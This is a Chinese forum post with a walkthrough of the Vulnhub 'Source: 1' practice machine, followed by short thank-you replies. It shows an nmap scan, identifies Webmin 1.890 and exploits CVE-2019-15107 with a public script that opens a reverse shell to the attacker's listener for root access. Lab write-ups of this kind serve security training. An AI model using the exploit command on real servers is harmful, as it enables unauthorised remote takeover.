Vulnhub-Source-1（CVE-2019-15107）

各卧唯 · 2025-6-4 21:39:19

一、靶机搭建

选择打开选项

选中下载的ova文件，然后导入选择一个存放路径即可

如果遇到不兼容的情况，可以打开.vmx修改，改为和虚拟机一个版本号

二、信息收集

官方信息

Name: Source: 1
Date release: 17 Jul 2020
难度：初级
描述：为 AttackerKB 聊天室创建的简单 CTF 盒子。这是练习的独立版本。这个框可能会出现在供应链攻击的后续房间里，因为它是一个很好的最新例子。

复制代码

扫ip

靶机ip：192.168.108.154

扫开放服务和端口

开放了22和10000端口

指纹探测

nmap 192.168.108.154 -p 22,10000 -sV -sC -O --version-all

复制代码

没什么可以利用的信息，看到10000端口版本信息，MiniServ 1.890 （Webmin httpd）

目录扫描

dirsearch扫描看看，扫不出来

dirb扫描，无结果

三、Web渗渗透

访问10000端口，是一个登录网站，源码和指纹信息都没有什么利用点

想到刚才找到的网站版本号，查找一下历史漏洞

下载下来查看一下，需要结合msf才能使用

CVE-2019-15107-Webmin远程命令执行漏洞

上网搜一下看看，存在漏洞，参考文章：

https://github.com/squid22/Webmin_CVE-2019-15107
https://github.com/jas502n/CVE-2019-15107?tab=readme-ov-file

复制代码

下载exp到kali
四、提权

赋予权限

开启监听端口，并执行脚本

./webmin_exploit.py 192.168.108.154 10000 192.168.108.130 4444

复制代码

拿到root权限

在跟目录下发现flag

flag：THM{UPDATE_YOUR_INSTALL}

来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

锑砖 · 2025-11-30 16:16:00

谢谢楼主提供！

康器 · 2025-12-24 05:39:06

收藏一下不知道什么时候能用到

郦珠雨 · 2025-12-27 02:42:29

鼓励转贴优秀软件安全工具和文档！

赫连如冰 · 2025-12-29 14:52:59

很好很强大我过来先占个楼待编辑

咒卖箴 · 2026-1-14 00:09:01

喜欢鼓捣这些软件，现在用得少，谢谢分享！

仟仞 · 2026-1-17 02:32:06

分享、互助让互联网精神温暖你我

梨恐 · 2026-1-19 23:09:08

用心讨论，共获提升！

闻成 · 2026-1-20 23:23:10

收藏一下不知道什么时候能用到

昝琳怡 · 2026-1-21 05:56:53

收藏一下不知道什么时候能用到

袁可佳 · 2026-1-27 02:26:20

用心讨论，共获提升！

倡遍竽 · 2026-2-3 20:58:56

谢谢分享，试用一下

纪音悦 · 2026-2-4 05:16:32

谢谢楼主提供！

全叶农 · 2026-2-4 05:28:32

不错，里面软件多更新就更好了

百谖夷 · 2026-2-6 23:41:53

用心讨论，共获提升！

林鱼 · 2026-2-7 04:41:40

前排留名，哈哈哈

娥搽裙 · 2026-2-7 08:34:39

东西不错很实用谢谢分享

闵雇 · 2026-2-8 21:30:23

前排留名，哈哈哈

挚魉 · 2026-2-9 02:43:37

用心讨论，共获提升！

皇甫佳文 · 2026-2-9 05:45:26

过来提前占个楼

账号		自动登录	找回密码
密码			立即注册

Vulnhub-Source-1（CVE-2019-15107）

相关帖子

回复

浏览过的版块

签约作者

Vulnhub-Source-1（CVE-2019-15107）

相关帖子

相关推荐

回复

浏览过的版块

签约作者